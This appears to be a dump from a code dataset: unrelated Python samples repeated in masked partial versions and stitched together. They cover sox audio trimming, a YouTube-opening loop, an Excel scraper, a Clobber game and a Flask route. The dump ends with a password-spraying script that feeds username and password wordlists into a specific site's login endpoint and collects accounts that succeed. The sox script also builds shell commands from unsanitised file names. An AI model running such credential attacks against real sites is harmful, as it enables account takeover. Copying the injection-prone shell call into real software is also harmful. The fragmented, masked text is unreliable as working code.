cutEnd):\r\n duration = cutEnd - cutBegin\r\n try:\r\n check_output(\"sox \" + audioFileName + \" \" + cutFileName + \" trim \" + str(cutBegin) + \" \" + str(duration), shell = True, stderr=STDOUT)\r\n except CalledProcessError as exc: \r\n utils.eprintCalledProcessError(exc, \"à SOX\")\r\n sys.exit(1)\r\n\r\ndef main(audioFileName, transFileName, outputFileName, beginningTime=None, endTime=None):\r\n extension = path.splitext(transFileName)[1]\r\n if (extension == \".stm\"):\r\n (debut, fin) = searchBeginAndEndStm(transFileName)\r\n elif (extension == \".mlfmanu\"):\r\n (debut, fin) = searchBeginAndEndMlfmanu(transFileName)\r\n \r\n # On prend les temps \"les plus limitants\"\r\n if (beginningTime is not None and beginningTime > debut):\r\n debut = beginningTime\r\n if (endTime is not None and endTime < fin):\r\n fin = endTime\r\n\r\n cutAudioFile(audioFileName, outputFileName, debut, fin) # On coupe le fichier audio\r\n\r\ndef parseArgs():\r\n parser = ArgumentParser(description=\"Programme python permettant de couper un fichier audio en retirant un silence ou un passage musical au début ou à la fin du fichier à l'aide de son fichier de transcription.\\n\"\r\n \"Si les options -beginning ou -end sont spécifiées, le temps le plus limitant entre le contenu de la transcription et l'option sera utilisé.\", formatter_class=RawTextHelpFormatter)\r\n parser.add_argument(\"audioFileName\", metavar=\"audioFile\",\r\n help=\"fichier audio (extension wav uniquement).\",\r\n type=utils.isValidFile)\r\n parser.add_argument(\"transFileName\", metavar=\"transcriptFile\",\r\n help=\"fichier de transcription (extensions stm et mlfmanu supportées).\",\r\n type=utils.isValidTranscriptFile)\r\n parser.add_argument(\"outputFileName\", metavar=\"outputFile\",\r\n help=\"nom du fichier de sortie (coupé).\")\t\t\t\t\t\t\r\n parser.add_argument(\"-b\", \"--beginning\", dest=\"beginningTime\", required=False,\r\n help=\"le temps de début de la coupe.\", metavar=\"beginningTime\",\r\n type=utils.isPositiveNumber)\r\n parser.add_argument(\"-e\", \"--end\", dest=\"endTime\", required=False,\r\n help=\"le temps de fin de la coupe.\", metavar=\"endTime\",\r\n type=utils.isPositiveNumber)\r\n \r\n args = parser.parse_args()\r\n \r\n return (args.audioFileName, args.transFileName, args.outputFileName, args.beginningTime, args.endTime)\r\n \r\nif __name__ == '__main__':\r\n args = parseArgs() # Parse les arguments\r\n main(*args) # Unpack le tuple et passe les éléments en paramétre du main \r\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
while count < total:
webbrowser.open('https://www.youtube.com/watch?v=GoSBNNgf_Vc')
time.sleep(5 * 60 * 60)
count += 1
<|reserved_special_token_1|>
<|reserved_special_token_0|>
total = 3
count = 0
while count < total:
webbrowser.open('https://www.youtube.com/watch?v=GoSBNNgf_Vc')
time.sleep(5 * 60 * 60)
count += 1
<|reserved_special_token_1|>
import webbrowser
import time
total = 3
count = 0
while count < total:
webbrowser.open('https://www.youtube.com/watch?v=GoSBNNgf_Vc')
time.sleep(5 * 60 * 60)
count += 1
|
flexible
|
{
"blob_id": "e11a04cad967ae377449aab8b12bfde23e403335",
"index": 8391,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile count < total:\n webbrowser.open('https://www.youtube.com/watch?v=GoSBNNgf_Vc')\n time.sleep(5 * 60 * 60)\n count += 1\n",
"step-3": "<mask token>\ntotal = 3\ncount = 0\nwhile count < total:\n webbrowser.open('https://www.youtube.com/watch?v=GoSBNNgf_Vc')\n time.sleep(5 * 60 * 60)\n count += 1\n",
"step-4": "import webbrowser\nimport time\ntotal = 3\ncount = 0\nwhile count < total:\n webbrowser.open('https://www.youtube.com/watch?v=GoSBNNgf_Vc')\n time.sleep(5 * 60 * 60)\n count += 1\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import scraperwiki
import xlrd
xlbin = scraperwiki.scrape("http://www.whatdotheyknow.com/request/82804/response/208592/attach/2/ACCIDENTS%20TRAMS%20Laurderdale.xls")
book = xlrd.open_workbook(file_contents=xlbin)
sheet = book.sheet_by_index(0)
for n, s in enumerate(book.sheets()):
print "Sheet %d is called %s and has %d columns and %d rows" % (n, s.name, s.ncols, s.nrows)
print sheet.row_values(4)
import datetime
def cellval(cell, datemode):
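    # Normalise an xlrd cell: dates become date/datetime objects, empty cells
    # become None, booleans become real bools, anything else passes through.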
if cell.ctype == xlrd.XL_CELL_DATE:
datetuple = xlrd.xldate_as_tuple(cell.value, datemode)
if datetuple[3:] == (0, 0, 0):
return datetime.date(datetuple[0], datetuple[1], datetuple[2])
        return datetime.datetime(datetuple[0], datetuple[1], datetuple[2], datetuple[3], datetuple[4], datetuple[5]) # a time-of-day component needs datetime.datetime
if cell.ctype == xlrd.XL_CELL_EMPTY: return None
if cell.ctype == xlrd.XL_CELL_BOOLEAN: return cell.value == 1
return cell.value
print [ cellval(c, book.datemode) for c in sheet.row(4) ]
keys = sheet.row_values(2)
keys[1] = keys[1].replace('.', '')
print keys
for rownumber in range(4, sheet.nrows):
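    # Rows 0-3 are header rows; store each data row keyed by its row number.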
values = [ cellval(c, book.datemode) for c in sheet.row(rownumber) ]
data = dict(zip(keys, values))
data['rownumber'] = rownumber
del data['']
if data['DATE'] != None and data['FLEET NO'] != None:
scraperwiki.sqlite.save(unique_keys=['rownumber'], data=data)
|
normal
|
{
"blob_id": "86ec33393bb19ee432c30834ea7983b11f4d1234",
"index": 5169,
"step-1": "import scraperwiki\nimport xlrd\nxlbin = scraperwiki.scrape(\"http://www.whatdotheyknow.com/request/82804/response/208592/attach/2/ACCIDENTS%20TRAMS%20Laurderdale.xls\")\nbook = xlrd.open_workbook(file_contents=xlbin)\n\nsheet = book.sheet_by_index(0)\n\nfor n, s in enumerate(book.sheets()):\n print \"Sheet %d is called %s and has %d columns and %d rows\" % (n, s.name, s.ncols, s.nrows)\n\nprint sheet.row_values(4)\n\n\nimport datetime\ndef cellval(cell, datemode):\n if cell.ctype == xlrd.XL_CELL_DATE:\n datetuple = xlrd.xldate_as_tuple(cell.value, datemode)\n if datetuple[3:] == (0, 0, 0):\n return datetime.date(datetuple[0], datetuple[1], datetuple[2])\n return datetime.date(datetuple[0], datetuple[1], datetuple[2], datetuple[3], datetuple[4], datetuple[5])\n if cell.ctype == xlrd.XL_CELL_EMPTY: return None\n if cell.ctype == xlrd.XL_CELL_BOOLEAN: return cell.value == 1\n return cell.value\n\nprint [ cellval(c, book.datemode) for c in sheet.row(4) ]\n\nkeys = sheet.row_values(2)\nkeys[1] = keys[1].replace('.', '')\nprint keys\n\nfor rownumber in range(4, sheet.nrows):\n values = [ cellval(c, book.datemode) for c in sheet.row(rownumber) ]\n data = dict(zip(keys, values))\n data['rownumber'] = rownumber\n del data['']\n if data['DATE'] != None and data['FLEET NO'] != None:\n scraperwiki.sqlite.save(unique_keys=['rownumber'], data=data)\nimport scraperwiki\nimport xlrd\nxlbin = scraperwiki.scrape(\"http://www.whatdotheyknow.com/request/82804/response/208592/attach/2/ACCIDENTS%20TRAMS%20Laurderdale.xls\")\nbook = xlrd.open_workbook(file_contents=xlbin)\n\nsheet = book.sheet_by_index(0)\n\nfor n, s in enumerate(book.sheets()):\n print \"Sheet %d is called %s and has %d columns and %d rows\" % (n, s.name, s.ncols, s.nrows)\n\nprint sheet.row_values(4)\n\n\nimport datetime\ndef cellval(cell, datemode):\n if cell.ctype == xlrd.XL_CELL_DATE:\n datetuple = xlrd.xldate_as_tuple(cell.value, datemode)\n if datetuple[3:] == (0, 0, 0):\n return datetime.date(datetuple[0], datetuple[1], datetuple[2])\n return datetime.date(datetuple[0], datetuple[1], datetuple[2], datetuple[3], datetuple[4], datetuple[5])\n if cell.ctype == xlrd.XL_CELL_EMPTY: return None\n if cell.ctype == xlrd.XL_CELL_BOOLEAN: return cell.value == 1\n return cell.value\n\nprint [ cellval(c, book.datemode) for c in sheet.row(4) ]\n\nkeys = sheet.row_values(2)\nkeys[1] = keys[1].replace('.', '')\nprint keys\n\nfor rownumber in range(4, sheet.nrows):\n values = [ cellval(c, book.datemode) for c in sheet.row(rownumber) ]\n data = dict(zip(keys, values))\n data['rownumber'] = rownumber\n del data['']\n if data['DATE'] != None and data['FLEET NO'] != None:\n scraperwiki.sqlite.save(unique_keys=['rownumber'], data=data)\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import pygame
from clobber.constants import GREY, ROWS, WHITE, SQUARE_SIZE, COLS, YELLOW, BLACK
from clobber.piece import Piece
class Board:
def __init__(self):
self.board = []
self.selected_piece = None
self.create_board()
def draw_squares(self, win):
win.fill(GREY)
for row in range(ROWS):
for col in range(row % 2, COLS, 2):
pygame.draw.rect(win, WHITE, (row * SQUARE_SIZE, col * SQUARE_SIZE,
SQUARE_SIZE, SQUARE_SIZE))
def create_board(self):
for row in range(ROWS):
self.board.append([])
for col in range(COLS):
if col % 2 == ((row + 1) % 2):
self.board[row].append(Piece(row, col, YELLOW))
else:
self.board[row].append(Piece(row, col, BLACK))
def draw(self, win):
self.draw_squares(win)
for row in range(ROWS):
for col in range(COLS):
piece = self.board[row][col]
if piece != 0:
piece.draw(win)
def move(self, piece, row, col):
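        # Clobber move: vacate the origin square and overwrite (capture)
        # whatever piece sits on the destination square.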
self.board[piece.row][piece.col], self.board[row][col] = 0, self.board[piece.row][piece.col]
piece.move(row, col)
def get_piece(self, row, col):
return self.board[row][col]
def get_valid_moves(self, piece):
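        # A piece may only step onto an orthogonally adjacent enemy piece.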
moves = []
# left
if piece.col != 0:
watch_p = self.board[piece.row][piece.col - 1]
if watch_p != 0 and watch_p.color != piece.color:
moves.append((watch_p.row, watch_p.col))
# top
if piece.row != 0:
watch_p = self.board[piece.row - 1][piece.col]
if watch_p != 0 and watch_p.color != piece.color:
moves.append((watch_p.row, watch_p.col))
# right
if piece.col != len(self.board[piece.row]) - 1:
watch_p = self.board[piece.row][piece.col + 1]
if watch_p != 0 and watch_p.color != piece.color:
moves.append((watch_p.row, watch_p.col))
# down
if piece.row != len(self.board) - 1:
watch_p = self.board[piece.row + 1][piece.col]
if watch_p != 0 and watch_p.color != piece.color:
moves.append((watch_p.row, watch_p.col))
return moves
def evaluate(self):
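        # Position score: yellow minus black, counting only pieces that still
        # have at least one occupied neighbour (see is_dead below).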
amount_of_yellow = 0
amount_of_black = 0
for row in self.board:
for piece in row:
if piece == 0:
continue
if piece.color == YELLOW:
if not self.is_dead(piece):
amount_of_yellow += 1
else:
if not self.is_dead(piece):
amount_of_black += 1
return amount_of_yellow - amount_of_black
def is_dead(self, piece):
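        # "Dead" = all orthogonal neighbour squares are empty. Empty squares
        # never refill in Clobber, so such a piece can never move again.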
# left
if piece.col != 0:
watch_p = self.board[piece.row][piece.col - 1]
if watch_p != 0:
return False
# top
if piece.row != 0:
watch_p = self.board[piece.row - 1][piece.col]
if watch_p != 0:
return False
# right
if piece.col != len(self.board[piece.row]) - 1:
watch_p = self.board[piece.row][piece.col + 1]
if watch_p != 0:
return False
# down
if piece.row != len(self.board) - 1:
watch_p = self.board[piece.row + 1][piece.col]
if watch_p != 0:
return False
return True
def get_all_pieces(self, color):
pieces = []
for row in self.board:
for piece in row:
if piece != 0 and piece.color == color:
pieces.append(piece)
return pieces
def winner(self):
for row in self.board:
for piece in row:
if piece != 0:
if len(self.get_valid_moves(piece)) != 0:
return None
return BLACK
|
normal
|
{
"blob_id": "b80b997f802c7ed4f0a838030703a314f2383c9d",
"index": 5226,
"step-1": "<mask token>\n\n\nclass Board:\n <mask token>\n\n def draw_squares(self, win):\n win.fill(GREY)\n for row in range(ROWS):\n for col in range(row % 2, COLS, 2):\n pygame.draw.rect(win, WHITE, (row * SQUARE_SIZE, col *\n SQUARE_SIZE, SQUARE_SIZE, SQUARE_SIZE))\n\n def create_board(self):\n for row in range(ROWS):\n self.board.append([])\n for col in range(COLS):\n if col % 2 == (row + 1) % 2:\n self.board[row].append(Piece(row, col, YELLOW))\n else:\n self.board[row].append(Piece(row, col, BLACK))\n\n def draw(self, win):\n self.draw_squares(win)\n for row in range(ROWS):\n for col in range(COLS):\n piece = self.board[row][col]\n if piece != 0:\n piece.draw(win)\n <mask token>\n <mask token>\n\n def get_valid_moves(self, piece):\n moves = []\n if piece.col != 0:\n watch_p = self.board[piece.row][piece.col - 1]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n if piece.row != 0:\n watch_p = self.board[piece.row - 1][piece.col]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n if piece.col != len(self.board[piece.row]) - 1:\n watch_p = self.board[piece.row][piece.col + 1]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n if piece.row != len(self.board) - 1:\n watch_p = self.board[piece.row + 1][piece.col]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n return moves\n\n def evaluate(self):\n amount_of_yellow = 0\n amount_of_black = 0\n for row in self.board:\n for piece in row:\n if piece == 0:\n continue\n if piece.color == YELLOW:\n if not self.is_dead(piece):\n amount_of_yellow += 1\n elif not self.is_dead(piece):\n amount_of_black += 1\n return amount_of_yellow - amount_of_black\n <mask token>\n\n def get_all_pieces(self, color):\n pieces = []\n for row in self.board:\n for piece in row:\n if piece != 0 and piece.color == color:\n pieces.append(piece)\n return pieces\n\n def winner(self):\n for row in self.board:\n for piece in row:\n if piece != 0:\n if len(self.get_valid_moves(piece)) != 0:\n return None\n return BLACK\n",
"step-2": "<mask token>\n\n\nclass Board:\n <mask token>\n\n def draw_squares(self, win):\n win.fill(GREY)\n for row in range(ROWS):\n for col in range(row % 2, COLS, 2):\n pygame.draw.rect(win, WHITE, (row * SQUARE_SIZE, col *\n SQUARE_SIZE, SQUARE_SIZE, SQUARE_SIZE))\n\n def create_board(self):\n for row in range(ROWS):\n self.board.append([])\n for col in range(COLS):\n if col % 2 == (row + 1) % 2:\n self.board[row].append(Piece(row, col, YELLOW))\n else:\n self.board[row].append(Piece(row, col, BLACK))\n\n def draw(self, win):\n self.draw_squares(win)\n for row in range(ROWS):\n for col in range(COLS):\n piece = self.board[row][col]\n if piece != 0:\n piece.draw(win)\n <mask token>\n\n def get_piece(self, row, col):\n return self.board[row][col]\n\n def get_valid_moves(self, piece):\n moves = []\n if piece.col != 0:\n watch_p = self.board[piece.row][piece.col - 1]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n if piece.row != 0:\n watch_p = self.board[piece.row - 1][piece.col]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n if piece.col != len(self.board[piece.row]) - 1:\n watch_p = self.board[piece.row][piece.col + 1]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n if piece.row != len(self.board) - 1:\n watch_p = self.board[piece.row + 1][piece.col]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n return moves\n\n def evaluate(self):\n amount_of_yellow = 0\n amount_of_black = 0\n for row in self.board:\n for piece in row:\n if piece == 0:\n continue\n if piece.color == YELLOW:\n if not self.is_dead(piece):\n amount_of_yellow += 1\n elif not self.is_dead(piece):\n amount_of_black += 1\n return amount_of_yellow - amount_of_black\n <mask token>\n\n def get_all_pieces(self, color):\n pieces = []\n for row in self.board:\n for piece in row:\n if piece != 0 and piece.color == color:\n pieces.append(piece)\n return pieces\n\n def winner(self):\n for row in self.board:\n for piece in row:\n if piece != 0:\n if len(self.get_valid_moves(piece)) != 0:\n return None\n return BLACK\n",
"step-3": "<mask token>\n\n\nclass Board:\n <mask token>\n\n def draw_squares(self, win):\n win.fill(GREY)\n for row in range(ROWS):\n for col in range(row % 2, COLS, 2):\n pygame.draw.rect(win, WHITE, (row * SQUARE_SIZE, col *\n SQUARE_SIZE, SQUARE_SIZE, SQUARE_SIZE))\n\n def create_board(self):\n for row in range(ROWS):\n self.board.append([])\n for col in range(COLS):\n if col % 2 == (row + 1) % 2:\n self.board[row].append(Piece(row, col, YELLOW))\n else:\n self.board[row].append(Piece(row, col, BLACK))\n\n def draw(self, win):\n self.draw_squares(win)\n for row in range(ROWS):\n for col in range(COLS):\n piece = self.board[row][col]\n if piece != 0:\n piece.draw(win)\n\n def move(self, piece, row, col):\n self.board[piece.row][piece.col], self.board[row][col] = 0, self.board[\n piece.row][piece.col]\n piece.move(row, col)\n\n def get_piece(self, row, col):\n return self.board[row][col]\n\n def get_valid_moves(self, piece):\n moves = []\n if piece.col != 0:\n watch_p = self.board[piece.row][piece.col - 1]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n if piece.row != 0:\n watch_p = self.board[piece.row - 1][piece.col]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n if piece.col != len(self.board[piece.row]) - 1:\n watch_p = self.board[piece.row][piece.col + 1]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n if piece.row != len(self.board) - 1:\n watch_p = self.board[piece.row + 1][piece.col]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n return moves\n\n def evaluate(self):\n amount_of_yellow = 0\n amount_of_black = 0\n for row in self.board:\n for piece in row:\n if piece == 0:\n continue\n if piece.color == YELLOW:\n if not self.is_dead(piece):\n amount_of_yellow += 1\n elif not self.is_dead(piece):\n amount_of_black += 1\n return amount_of_yellow - amount_of_black\n\n def is_dead(self, piece):\n if piece.col != 0:\n watch_p = self.board[piece.row][piece.col - 1]\n if watch_p != 0:\n return False\n if piece.row != 0:\n watch_p = self.board[piece.row - 1][piece.col]\n if watch_p != 0:\n return False\n if piece.col != len(self.board[piece.row]) - 1:\n watch_p = self.board[piece.row][piece.col + 1]\n if watch_p != 0:\n return False\n if piece.row != len(self.board) - 1:\n watch_p = self.board[piece.row + 1][piece.col]\n if watch_p != 0:\n return False\n return True\n\n def get_all_pieces(self, color):\n pieces = []\n for row in self.board:\n for piece in row:\n if piece != 0 and piece.color == color:\n pieces.append(piece)\n return pieces\n\n def winner(self):\n for row in self.board:\n for piece in row:\n if piece != 0:\n if len(self.get_valid_moves(piece)) != 0:\n return None\n return BLACK\n",
"step-4": "import pygame\nfrom clobber.constants import GREY, ROWS, WHITE, SQUARE_SIZE, COLS, YELLOW, BLACK\nfrom clobber.piece import Piece\n\n\nclass Board:\n\n def __init__(self):\n self.board = []\n self.selected_piece = None\n self.create_board()\n\n def draw_squares(self, win):\n win.fill(GREY)\n for row in range(ROWS):\n for col in range(row % 2, COLS, 2):\n pygame.draw.rect(win, WHITE, (row * SQUARE_SIZE, col *\n SQUARE_SIZE, SQUARE_SIZE, SQUARE_SIZE))\n\n def create_board(self):\n for row in range(ROWS):\n self.board.append([])\n for col in range(COLS):\n if col % 2 == (row + 1) % 2:\n self.board[row].append(Piece(row, col, YELLOW))\n else:\n self.board[row].append(Piece(row, col, BLACK))\n\n def draw(self, win):\n self.draw_squares(win)\n for row in range(ROWS):\n for col in range(COLS):\n piece = self.board[row][col]\n if piece != 0:\n piece.draw(win)\n\n def move(self, piece, row, col):\n self.board[piece.row][piece.col], self.board[row][col] = 0, self.board[\n piece.row][piece.col]\n piece.move(row, col)\n\n def get_piece(self, row, col):\n return self.board[row][col]\n\n def get_valid_moves(self, piece):\n moves = []\n if piece.col != 0:\n watch_p = self.board[piece.row][piece.col - 1]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n if piece.row != 0:\n watch_p = self.board[piece.row - 1][piece.col]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n if piece.col != len(self.board[piece.row]) - 1:\n watch_p = self.board[piece.row][piece.col + 1]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n if piece.row != len(self.board) - 1:\n watch_p = self.board[piece.row + 1][piece.col]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n return moves\n\n def evaluate(self):\n amount_of_yellow = 0\n amount_of_black = 0\n for row in self.board:\n for piece in row:\n if piece == 0:\n continue\n if piece.color == YELLOW:\n if not self.is_dead(piece):\n amount_of_yellow += 1\n elif not self.is_dead(piece):\n amount_of_black += 1\n return amount_of_yellow - amount_of_black\n\n def is_dead(self, piece):\n if piece.col != 0:\n watch_p = self.board[piece.row][piece.col - 1]\n if watch_p != 0:\n return False\n if piece.row != 0:\n watch_p = self.board[piece.row - 1][piece.col]\n if watch_p != 0:\n return False\n if piece.col != len(self.board[piece.row]) - 1:\n watch_p = self.board[piece.row][piece.col + 1]\n if watch_p != 0:\n return False\n if piece.row != len(self.board) - 1:\n watch_p = self.board[piece.row + 1][piece.col]\n if watch_p != 0:\n return False\n return True\n\n def get_all_pieces(self, color):\n pieces = []\n for row in self.board:\n for piece in row:\n if piece != 0 and piece.color == color:\n pieces.append(piece)\n return pieces\n\n def winner(self):\n for row in self.board:\n for piece in row:\n if piece != 0:\n if len(self.get_valid_moves(piece)) != 0:\n return None\n return BLACK\n",
"step-5": "import pygame\n\nfrom clobber.constants import GREY, ROWS, WHITE, SQUARE_SIZE, COLS, YELLOW, BLACK\nfrom clobber.piece import Piece\n\n\nclass Board:\n def __init__(self):\n self.board = []\n self.selected_piece = None\n self.create_board()\n\n def draw_squares(self, win):\n win.fill(GREY)\n for row in range(ROWS):\n for col in range(row % 2, COLS, 2):\n pygame.draw.rect(win, WHITE, (row * SQUARE_SIZE, col * SQUARE_SIZE,\n SQUARE_SIZE, SQUARE_SIZE))\n\n def create_board(self):\n for row in range(ROWS):\n self.board.append([])\n for col in range(COLS):\n if col % 2 == ((row + 1) % 2):\n self.board[row].append(Piece(row, col, YELLOW))\n else:\n self.board[row].append(Piece(row, col, BLACK))\n\n def draw(self, win):\n self.draw_squares(win)\n for row in range(ROWS):\n for col in range(COLS):\n piece = self.board[row][col]\n if piece != 0:\n piece.draw(win)\n\n def move(self, piece, row, col):\n self.board[piece.row][piece.col], self.board[row][col] = 0, self.board[piece.row][piece.col]\n piece.move(row, col)\n\n def get_piece(self, row, col):\n return self.board[row][col]\n\n def get_valid_moves(self, piece):\n moves = []\n\n # left\n if piece.col != 0:\n watch_p = self.board[piece.row][piece.col - 1]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n\n # top\n if piece.row != 0:\n watch_p = self.board[piece.row - 1][piece.col]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n\n # right\n if piece.col != len(self.board[piece.row]) - 1:\n watch_p = self.board[piece.row][piece.col + 1]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n\n # down\n if piece.row != len(self.board) - 1:\n watch_p = self.board[piece.row + 1][piece.col]\n if watch_p != 0 and watch_p.color != piece.color:\n moves.append((watch_p.row, watch_p.col))\n\n return moves\n\n def evaluate(self):\n amount_of_yellow = 0\n amount_of_black = 0\n\n for row in self.board:\n for piece in row:\n if piece == 0:\n continue\n if piece.color == YELLOW:\n if not self.is_dead(piece):\n amount_of_yellow += 1\n else:\n if not self.is_dead(piece):\n amount_of_black += 1\n\n return amount_of_yellow - amount_of_black\n\n def is_dead(self, piece):\n # left\n if piece.col != 0:\n watch_p = self.board[piece.row][piece.col - 1]\n if watch_p != 0:\n return False\n\n # top\n if piece.row != 0:\n watch_p = self.board[piece.row - 1][piece.col]\n if watch_p != 0:\n return False\n\n # right\n if piece.col != len(self.board[piece.row]) - 1:\n watch_p = self.board[piece.row][piece.col + 1]\n if watch_p != 0:\n return False\n\n # down\n if piece.row != len(self.board) - 1:\n watch_p = self.board[piece.row + 1][piece.col]\n if watch_p != 0:\n return False\n\n return True\n\n def get_all_pieces(self, color):\n pieces = []\n for row in self.board:\n for piece in row:\n if piece != 0 and piece.color == color:\n pieces.append(piece)\n return pieces\n\n def winner(self):\n for row in self.board:\n for piece in row:\n if piece != 0:\n if len(self.get_valid_moves(piece)) != 0:\n return None\n\n return BLACK\n",
"step-ids": [
8,
9,
11,
13,
14
]
}
|
[
8,
9,
11,
13,
14
] |
my_list = [1, 2, 4, 0, 4, 0, 10, 20, 0, 1]
new_list = list(filter(lambda x: x != 0, my_list))
try:
new = list(map(lambda x: 2 / x, new_list))
except ZeroDivisionError:
pass
print(new)
# def devis(n, list):
# new_list = []
# for i, m_list in enumerate(list):
# try:
# new_list.append(n/m_list)
# except ZeroDivisionError:
# new_list.append(None)
# return new_list
# print(devis(2, my_list))
|
normal
|
{
"blob_id": "46f3d3681343d96889ddb073f17ff7f225486f35",
"index": 8005,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ntry:\n new = list(map(lambda x: 2 / x, new_list))\nexcept ZeroDivisionError:\n pass\nprint(new)\n",
"step-3": "my_list = [1, 2, 4, 0, 4, 0, 10, 20, 0, 1]\nnew_list = list(filter(lambda x: x != 0, my_list))\ntry:\n new = list(map(lambda x: 2 / x, new_list))\nexcept ZeroDivisionError:\n pass\nprint(new)\n",
"step-4": "my_list = [1, 2, 4, 0, 4, 0, 10, 20, 0, 1]\nnew_list = list(filter(lambda x: x != 0, my_list))\n\ntry:\n new = list(map(lambda x: 2 / x, new_list))\nexcept ZeroDivisionError:\n pass\n\nprint(new)\n\n\n\n\n\n# def devis(n, list):\n# new_list = []\n# for i, m_list in enumerate(list):\n# try:\n# new_list.append(n/m_list)\n# except ZeroDivisionError:\n# new_list.append(None)\n# return new_list\n# print(devis(2, my_list))\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@app.route('/comments/new/')
@login_required(role='ANY')
def comments_form():
return render_template('comments/new.html', form=CommentForm())
<|reserved_special_token_1|>
from flask import render_template, request, redirect, url_for
from flask_login import current_user
from application import app, db, login_required
from application.auth.models import User
from application.memes.models import Meme
from application.comments.forms import CommentForm
@app.route('/comments/new/')
@login_required(role='ANY')
def comments_form():
return render_template('comments/new.html', form=CommentForm())
<|reserved_special_token_1|>
from flask import render_template, request, redirect, url_for
from flask_login import current_user
from application import app, db, login_required
from application.auth.models import User
from application.memes.models import Meme
from application.comments.forms import CommentForm
# only a dummy new comment form
@app.route("/comments/new/")
@login_required(role="ANY")
def comments_form():
return render_template("comments/new.html", form = CommentForm())
|
flexible
|
{
"blob_id": "fe1d47b63e88935f8b2eb4bac883f3028d6f560b",
"index": 4515,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\n@app.route('/comments/new/')\n@login_required(role='ANY')\ndef comments_form():\n return render_template('comments/new.html', form=CommentForm())\n",
"step-3": "from flask import render_template, request, redirect, url_for\nfrom flask_login import current_user\nfrom application import app, db, login_required\nfrom application.auth.models import User\nfrom application.memes.models import Meme\nfrom application.comments.forms import CommentForm\n\n\n@app.route('/comments/new/')\n@login_required(role='ANY')\ndef comments_form():\n return render_template('comments/new.html', form=CommentForm())\n",
"step-4": "from flask import render_template, request, redirect, url_for\nfrom flask_login import current_user\n\nfrom application import app, db, login_required\nfrom application.auth.models import User\nfrom application.memes.models import Meme\nfrom application.comments.forms import CommentForm\n\n# only a dummy new comment form\n\n@app.route(\"/comments/new/\")\n@login_required(role=\"ANY\")\ndef comments_form():\n return render_template(\"comments/new.html\", form = CommentForm())",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def login_limit_user():
"""
登录函数
"""
try:
login_info = dict_queue.get(block=False)
except Exception as e:
print('[Error] {0}'.format(repr(e)))
return
username = login_info[0]
if username in success_username:
return
password = login_info[1]
payload = {'username': username, 'password': password}
print('开始尝试用户名:{},密码:{}'.format(username, password))
url = 'http://ss.gentlecp.com:40000/user/login-block-account/?referer=/'
r = requests.post(url, data=payload)
if r.status_code == 200:
msg = login_info
success_str = '欢迎访问GentleCP的网站'
if success_str in r.text:
success_queue.put(msg)
success_username.append(username)
print('[INFO] success: ', msg)
def get_dict(dict_user, dict_pass):
"""
生成字典队列
:return:
"""
with open('dict/{}'.format(dict_user)) as f:
username = [line.strip() for line in f.readlines()]
with open('dict/{}'.format(dict_pass)) as f:
passwords = [line.strip() for line in f.readlines()]
count = 0
for u in username:
p = passwords[curr_round % len(passwords)]
count += 1
pair = u, p
dict_queue.put(pair)
print('字典生成完成,长度 {}'.format(count))
def get_parse() ->dict:
parser = argparse.ArgumentParser()
parser.add_argument('--username', '-u', help='用户名字典')
parser.add_argument('--password', '-p', help='密码字典')
dic = vars(parser.parse_args())
return dic
def print_result():
"""
打印爆破的结果
"""
success = []
while not success_queue.empty():
success.append(success_queue.get())
print('\n[INFO] 爆破结果: ', success)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def login_limit_user():
"""
登录函数
"""
try:
login_info = dict_queue.get(block=False)
except Exception as e:
print('[Error] {0}'.format(repr(e)))
return
username = login_info[0]
if username in success_username:
return
password = login_info[1]
payload = {'username': username, 'password': password}
print('开始尝试用户名:{},密码:{}'.format(username, password))
url = 'http://ss.gentlecp.com:40000/user/login-block-account/?referer=/'
r = requests.post(url, data=payload)
if r.status_code == 200:
msg = login_info
success_str = '欢迎访问GentleCP的网站'
if success_str in r.text:
success_queue.put(msg)
success_username.append(username)
print('[INFO] success: ', msg)
def get_dict(dict_user, dict_pass):
"""
生成字典队列
:return:
"""
with open('dict/{}'.format(dict_user)) as f:
username = [line.strip() for line in f.readlines()]
